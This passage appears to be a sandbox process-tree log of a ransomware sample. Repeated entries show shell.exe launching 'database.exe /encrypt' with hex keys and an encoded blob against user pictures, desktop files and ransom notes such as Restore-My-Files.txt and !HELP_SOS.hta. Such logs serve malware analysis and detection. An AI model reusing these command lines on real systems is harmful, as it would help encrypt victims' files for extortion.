                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\README_sTlLoTpq.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\Sample Media\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\#Decrypt_Files_ReadMe#.rtf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\A8TfBlMc-hK4WM9cK.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AddGroup.mp4.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7704
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AssertExpand.css.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7712
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisableProtect.cab.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisconnectWait.bmp.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7796
